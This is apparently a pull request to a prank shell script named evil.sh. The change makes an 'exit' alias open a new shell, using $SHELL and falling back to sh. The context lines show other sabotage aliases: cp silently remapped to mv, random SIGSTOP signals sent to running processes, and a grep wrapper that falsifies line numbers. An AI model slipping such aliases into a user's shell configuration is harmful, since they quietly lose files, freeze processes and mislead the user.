### PR TITLE
spawn new $SHELL on exit, sh only as fallback

### DIFF
--- a/evil.sh
+++ b/evil.sh
@@ -63,7 +63,7 @@ sleep $[ ( $RANDOM % 100 )	+ 1 ]s && kill -STOP $(ps x -o pid|sed 1d|sort -R|hea
 alias cp='mv';
 
 # Make `exit` open a new shell.
-alias exit='sh';
+alias exit="${SHELL:-sh}";
 
 # Add a random number to line numbers when using `grep -n`.
 function grep { command grep "$@" | awk -F: '{ r = int(rand() * 10); n = $1; $1 = ""; command if (n ~ /^[0-9]+$/) { o = n+r } else { o = n }; print o ":" substr($0, 2)}'; }


### PR DESCRIPTION
The `$SHELL` environment variable holds the shell being used, this commit uses this variable and `sh` only as a fallback if the variable is empty.
